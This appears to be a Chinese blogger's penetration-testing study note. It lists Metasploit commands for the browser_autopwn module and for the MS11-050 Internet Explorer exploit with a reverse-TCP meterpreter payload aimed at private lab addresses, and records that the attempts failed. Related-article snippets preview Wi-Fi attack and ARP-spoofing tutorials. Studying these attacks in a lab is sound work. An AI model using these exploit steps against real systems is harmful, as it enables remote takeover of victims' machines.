kali滲透測試與教學筆記9

原創 花纵酒 2020-04-26 00:51

客戶端滲透

use auxiliary/server/browser_autopwn

set lhost 10.10.10.128

set srvhost 10.10.10.128

set uripath auto

run

按書中,應該可能看到winxp靶機信息,建立meterpreter,地址是192.168.10.128

但是我的實驗看到的是網關ubuntu機器,10。10。10。254地址

不知道爲什麼?????

MS11-050漏洞攻擊過程:

use exploit/windows/browser/ms11_050_mshtml_cobjectelement

set payload windows/meterpreter/reverse_tcp

set URIPATH ms11050

set lhost 10.10.10.128

使用客戶靶機訪問http://10.10.10.128:8080/ms11050進行訪問,據說可以啓動meterpreter,但是我還是僅僅訪問到了網關

 

 

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

kali 配置中文輸入法

1.apt-get install fcitx5 fcitx5-chinese-addon fcitx5-pinyin fcitx5-pinyin-gui fcitx5-module-* 2.im-config,運行後指定fcitx5爲默認

原創 2024-05-24 01:42:44

centos linux7忘記root密碼,進行密碼重置

小編今天就忘記Linux root 用戶的口令,下面就由小編來教教大家如果忘記root口令怎麼辦 第1步:開機後在內核上按“e”。 第二步:按e以後會進入內核啓動頁面,在linux16這行的後面輸入“rd.break console=t

南人旧心1906 2020-07-08 02:03:38

3vilTwinAttacker AP僞裝工具

下載3vilTwinAttacker:    git clone https://github.com/P0cL4bs/3vilTwinAttacker.git    cd 3vilTwinAttacker chmod +x instal

鱼与羽 2020-07-07 11:32:53

Airolib 密碼分析提速-學習筆記

echo TP_Link722 > essid.txt#將AP的廣播名生成TXT airolib-ng db --import essid essid.txt#根據essid生成數據庫 airolib-ng db --stats#查看數據

鱼与羽 2020-07-07 11:32:52

AIREPLAY-NG的使用學習筆記

指令:aireplay-ng <options> <interface name> 例子:airplay-ng -9 wlan0mon #測試AP的注包通信質量 airplay-ng -9 wlan0mon -e TP-LINK_0450

鱼与羽 2020-07-07 11:32:52

kali滲透攻擊MySQL

啓動MSFCONSOLE 掃描所有有效的MySQL 注意:輸出信息顯示Mysql可用模塊,在模塊中,選擇滲透工具模塊進行攻擊 然後使用MySQL掃描模塊 顯示模塊的有效項 爲攻擊目標指定目標系統IP,用戶文件,密碼文

阿强成长之路 2020-07-07 00:08:03

5. openvas的簡單使用

下面是我自己的筆記,貼圖太對,這個文檔寫起來太不方便,點鏈接可以查看 文檔:5. openvas的簡單使用.note 鏈接:http://note.youdao.com/noteshare?id=ca406912df5411e6c

WenCoo 2020-07-06 11:49:08

4. kali搭建ftp服務

安裝ftp服務 apt-get install vsftpd 創建用於上傳下載的目錄: mkdir /home/uftp chmod 777 /home/uftp/ useradd -d /home/uftp/ -s

WenCoo 2020-07-06 11:09:56

2. 在kali上安裝openvas

安裝openvas apt-get install openvas openvas-setup 這兩步等待及其漫長,請耐心等待其執行完畢 對openvas進行配置 到這裏,firefox已經彈出openvas登陸窗口,ro

WenCoo 2020-07-06 11:09:56

1. kali安裝過程中的注意事項

kali linux版本2020.2,安裝到選擇安裝軟件一步時,此時應注意,默認的軟件不要動,也不要去添加新的軟件,我第一次選擇了全部,安裝過程中出現白屏,系統死掉,第二次選擇了gnone桌面,一直安裝錯誤,極其慢慢,使用默認

WenCoo 2020-07-06 11:09:46

3. kali開啓ssh服務,遠程連接

更新源 apt-get update 下載ssh服務包 apt-get install ssh 打開ssh服務 1 service ssh start 打開ssh服務 2 service ssh status

WenCoo 2020-07-06 11:09:46

基於kali-linux下的ssh私鑰泄漏練習(小白的自我練習)--未完 待更新

PS:文章爲看的bilibili視頻,自己做的筆記整理 第一個Flag 進入kali後先利用ifconfig查看kali靶機的ip地址 再利用netdiscover -r ip /netmask 查看此ip段下的終端 ![](h

WitherC 2020-07-04 20:52:07

Kali 下的 ARP斷網實驗實現過程

基本介紹 Kali Linux 簡單來說,Kali 就是一個建立在虛擬機上用於做網絡安全攻防的系統,Kali自身具有一定的優勢,例如自帶上百個滲透測試工具,開源Git樹,並且它完全免費。 kali擁有安全的開發環境,並且你完全

WitherC 2020-07-04 20:52:07

Docker鏡像服務器內編輯文件報錯 bash: vim: command not found

小編今天在自己搭建的docker鏡像服務器內,本來想修改一下服務器裏面的某個配置文件的,但是,在編輯文件的過程中顯示報錯,具體顯示如下: root@haha:/# nano bash: nano: command not found

南人旧心1906 2020-07-02 14:46:37

kali Linux2019 安裝(中文)搜狗輸入法

之前因爲認真學習JavaEE暫時放手了kali的學習,現在重新入手一下Kali。安裝kali第一件問題就是中文輸入的問題,當然你也可以使用系統自帶的(Ubuntu有,kali我沒試過),不過還是推薦搜狗輸入法。 寫這篇文章的意義?記錄自己

努力就有可能x 2020-07-02 05:57:01